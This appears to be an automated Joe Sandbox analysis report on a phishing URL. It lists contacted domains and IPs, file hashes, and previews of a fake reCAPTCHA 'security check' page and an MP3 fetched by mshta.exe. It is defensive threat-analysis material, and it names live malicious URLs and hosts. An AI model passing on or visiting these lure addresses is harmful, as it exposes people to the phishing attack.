        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        File Deletion        		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Extra Window Memory Injection        		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        Screenshots

        Download Video

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        https://aistreamx.com/67db9a04702992c391d24ddb0%Avira URL Cloudsafe

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://random-check.fly.storage.tigris.dev/favicon.ico0%Avira URL Cloudsafe
        https://pub-69ca4621dc04444c93e08fedc7fdae4d.r2.dev/iiii.mp30%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        pub-69ca4621dc04444c93e08fedc7fdae4d.r2.dev
        		162.159.140.237
        		truetrue
          		unknown
          random-check.fly.storage.tigris.dev
          		149.248.213.147
          		truetrue
            		unknown
            cdnjs.cloudflare.com
            		104.17.24.14
            		truefalse
              		high
              lb-ash-1.arunsaini.net
              		5.161.37.228
              		truefalse
                		unknown
                www.google.com
                		142.250.80.100
                		truefalse
                  		high
                  aistreamx.com
                  		unknown
                  		unknownfalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://random-check.fly.storage.tigris.dev/favicon.icotrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.cssfalse
                      		high
                      https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-brands-400.woff2false
                        		high
                        https://aistreamx.com/67db9a04702992c391d24ddbfalse
                          		unknown
                          https://pub-69ca4621dc04444c93e08fedc7fdae4d.r2.dev/iiii.mp3true
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          142.250.80.46
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          104.17.24.14
                          		cdnjs.cloudflare.comUnited States
                          		13335CLOUDFLARENETUSfalse
                          1.1.1.1
                          		unknownAustralia
                          		13335CLOUDFLARENETUSfalse
                          162.159.140.237
                          		pub-69ca4621dc04444c93e08fedc7fdae4d.r2.devUnited States
                          		13335CLOUDFLARENETUStrue
                          142.250.65.174
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          142.250.80.100
                          		www.google.comUnited States
                          		15169GOOGLEUSfalse
                          149.248.213.147
                          		random-check.fly.storage.tigris.devCanada
                          		174COGENT-174UStrue
                          142.251.32.99
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          142.250.80.99
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          5.161.37.228
                          		lb-ash-1.arunsaini.netGermany
                          		24940HETZNER-ASDEfalse
                          142.251.40.131
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          142.251.40.174
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          142.251.40.163
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          142.251.41.3
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          172.253.115.84
                          		unknownUnited States
                          		15169GOOGLEUSfalse

                          Private

                          IP
                          192.168.2.16
                          192.168.2.4

                          General Information

                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1646888
                          Start date and time:2025-03-24 11:53:42 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                          Sample URL:https://aistreamx.com/67db9a04702992c391d24ddb
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:17
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • EGA enabled
                          Analysis Mode:stream
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal76.phis.win@23/6@9/156
                          • Exclude process from analysis (whitelisted): svchost.exe
                          • Excluded IPs from analysis (whitelisted): 142.251.40.174, 142.251.41.3, 142.250.80.46, 172.253.115.84, 142.251.40.142, 142.250.65.206, 142.251.32.99, 142.251.40.163
                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtEnumerateKey calls found.
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: https://aistreamx.com/67db9a04702992c391d24ddb

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\iiii[1].mp3

                          Download File
                          Process:C:\Windows\System32\mshta.exe
                          File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo
                          Category:modified
                          Size (bytes):6012050
                          Entropy (8bit):7.977512283192218
                          Encrypted:false
                          SSDEEP:
                          MD5:07FA9B5D130081BC5B5BB102A1338511
                          SHA1:C56D0043209409913D3CF82637C7F3FADB5D8C8D
                          SHA-256:13207F618DA63AAEC4D78C58C8C5C955C0B3B6BD16B57E7F38C15FE3AE145B20
                          SHA-512:9339710E3D79E21669C464C154EBDF0F44CFC181B3FC49633580F0C88B9D066406394FAD0B97944521B53B68A81F32E104FA585B8416285128B6FE83B1DB1239
                          Malicious:false
                          Reputation:unknown
                          Preview:ID3......ETIT2.......Too Wide.TPE1.......Paper Clips.TRCK.......2.TALB.......Ocean.TDRC.......2020.TCON.......alternativerock.TCOM.......Paper Clips.WPUB......http://www.jamendo.com.TPUB.......http://www.jamendo.com.TXXX..."...Tagging time.2020-03-30T21:09:46.TENC...&...Jamendo:http://www.jamendo.com| LAME.WOAS...'..http://www.jamendo.com/en/album/191955.COMM...(...eng.http://www.jamendo.com cc_standard.WOAF...(..http://www.jamendo.com/en/track/1741601.WOAR...(..http://www.jamendo.com/en/artist/527422.WCOP...2..http://creativecommons.org/licenses/by-nc-nd/3.0/.TCOP...3...http://creativecommons.org/licenses/by-nc-nd/3.0/.APIC...n...image/jpeg.........JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."........................................D.......................!.1.AQa."q.2.....#....BR..3b..$..%r...CS..................................1.......................!.1A.Qa"..Rq....

                          Chrome Cache Entry: 50

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:XML 1.0 document, ASCII text
                          Category:downloaded
                          Size (bytes):262
                          Entropy (8bit):5.168204553522424
                          Encrypted:false
                          SSDEEP:
                          MD5:D2CE7A2C5DF41DEEAD149E5D3FA10C00
                          SHA1:F1C32D1E044999096B44EA4295CA6E3773230CC5
                          SHA-256:D9F6284F8A51F14D42F126E7D5EE0217AC934588EF49C60C1796DC0FF2F22F44
                          SHA-512:54E5EDA61EE59A37941ECD04480B5EE71A10C83777E6FAAD29AD748C6EE2757ED451BC88BC9B52A7D5EF2A34384C6D38F5DE57E87883A3A9A0239006F52977B8
                          Malicious:false
                          Reputation:unknown
                          URL:https://random-check.fly.storage.tigris.dev/favicon.ico
                          Preview:<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Resource>/favicon.ico</Resource><RequestId>1742813655337569305</RequestId><Key>favicon.ico</Key><BucketName>random-check</BucketName></Error>

                          Chrome Cache Entry: 51

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):2228
                          Entropy (8bit):7.82817506159911
                          Encrypted:false
                          SSDEEP:
                          MD5:EF9941290C50CD3866E2BA6B793F010D
                          SHA1:4736508C795667DCEA21F8D864233031223B7832
                          SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                          SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                          Malicious:false
                          Reputation:unknown
                          Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.

                          Chrome Cache Entry: 53

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Web Open Font Format (Version 2), TrueType, length 105204, version 768.67
                          Category:downloaded
                          Size (bytes):105204
                          Entropy (8bit):7.989899350029445
                          Encrypted:false
                          SSDEEP:
                          MD5:EE91E640B5449FB98D9320C877A9866E
                          SHA1:7FDC6B3926B1DD023F9F2AD7D53BC22694694281
                          SHA-256:33A252D6393CBD6DEBE0AC517229C7AA258A0EE68FC0253F8BE6A7CEE8B65EE9
                          SHA-512:B787D1E727C77E85DE52FDEDEA16A719BE00CFABF739F44451A2A35DB443900E8B3178DB1DDD5EAE9018850888B94994343E9B1E15873CD0211DAE83C405BD3D
                          Malicious:false
                          Reputation:unknown
                          URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-brands-400.woff2
                          Preview:wOF2...............h.......C.....................8.$. .`..D..8..`.H..H. ..VQf......Z?.....=..j..o......._......; ..o.....9..........'P.....U.....P.[.+7.\4....Y.B.d....[.h.!.....Z...2.....]5..]]]3..f.......E......9`.2.A'N.X..v....N....C#.yZ.Z............4.....I.Y...;..(q@..8H..m~v.KN....{.F..:..%..u...)U!JP...$v......(.n./.S:.(T..Mh.(.t../...N+.|..o.......9Zr!P.........T\...c!#.||*.....O4G(.........p.{?..#...Y..2".`DV.....U..jNT.3[.9}.$g.(.....H.Y5"......GD.#.`.Er.......(..Z.>...D...%.].[.......p..!..qU.&'Q .$.j2......B..........^.`4..L.[....R......Q.+.[.q..%...........A..$..N.A.aK.d.'. ..7~..t.a.oj...8....u._h%.+.%.K...GC....R.|..u.W.......L..{W.....d.u:..L.Q...<.YBt....X.s.z"#....R$Tg.9......@A.;.?.w}.u.z...".'..w..i....w..&...i...3....,.n.hC<..8.3(...L..4....3....'x.M.J}...v.......S.4._[......>a.@I.8i[.S....A...%..Y2.ezM...M..%>.af.P.?...8..G...x:.......Hi.:..S.\.g....6.IY...i..aN~..F...c....al;1.R.3.._.l#...3..s?M.5..|...4h

                          Chrome Cache Entry: 54

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (65311)
                          Category:downloaded
                          Size (bytes):83981
                          Entropy (8bit):4.7735566283508355
                          Encrypted:false
                          SSDEEP:
                          MD5:3D5EF2BF867C4054A2F336CDBAD9E1DC
                          SHA1:07228D1FA3245EE156A27A353F45758A3207849F
                          SHA-256:A361E7885C36BACB3FD9CB068DA207C3B9329962CAC022D06E28923939F575E8
                          SHA-512:168DEB96B663FE4EEE8D39C78380864760FB912B34BF82CB6A7C36AA4B18B91944CCEFAD71A10F428810D0A6A818DDBAFF3AE7DB42264750DFB8B5A73A8EDA04
                          Malicious:false
                          Reputation:unknown
                          URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
                          Preview:/*!. * Font Awesome Free 6.0.0-beta3 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2021 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-duotone,.fa-light,.fa-regular,.fa-solid,.fa-thin,.fab,.fad,.fal,.far,.fas,.fat{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-height:.08333em;vertical-align:.125em}.fa-sm{font-size:.875em;line-height:.07143em;vertical-align:.0

                          Chrome Cache Entry: 55

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                          Category:downloaded
                          Size (bytes):5307
                          Entropy (8bit):5.697362617511034
                          Encrypted:false
                          SSDEEP:
                          MD5:D8A5C7C2BE846B83DCF2D6C6E84783D1
                          SHA1:DBD0C7BE03C044481AC1B3E1A37E474189E0D419
                          SHA-256:65FFB34BD1682D6C9A08838C72519F9F2F6C008C4257074632530AC4DB08358B
                          SHA-512:6719AF1975A5D069431E89E06058E0230DA80841E33A9DA4AF1B24C5C2813E3FBEAF82C02D3EB58FF3F5C9CADED0A9D7FC1161E575DA0E6877D2A7698C11AA1C
                          Malicious:false
                          Reputation:unknown
                          URL:https://random-check.fly.storage.tigris.dev/pass-this-security-check.html?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=tid_RybmvaL_VPmJmFgiNKurjXyuWNvFGfefZntnOVLTLtBupRlkVi%2F20250323%2Fauto%2Fs3%2Faws4_request&X-Amz-Date=20250323T095737Z&X-Amz-Expires=518400&X-Amz-SignedHeaders=host&X-Amz-Signature=a06915b9229b481cc5fe9e3c9d63289209b196ef3db05e2da16ce691e820affd
                          Preview:.<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width,initial-scale=1.0">.. <title>reCAPTCHA V3 demo</title>.. <meta name="robots" content="noindex,nofollow">.. <meta name="googlebot" content="noindex,nofollow">.. <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">.. <style>.. /* ........ ..... */.. body,html{margin:0;padding:0;width:100%;height:100%;display:flex;justify-content:center;align-items:center;font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;background:#f2f2f2;color:#333}.. .a{position:relative;text-align:center;max-width:500px;margin:20px;}.. .b{padding:20px;background:#fff;box-shadow:0 5px 20px rgba(0,0,0,.3);border-radius:8px;text-align:center}.. .b h2{margin:0 0 20px;font-size:28px;color:#4285f4}.. .b p{margin:0 0 20px;font-size:18px;color:#666}.. .c{display:inline-flex;align-items:center;padding:10

                          Static File Info

                          No static file info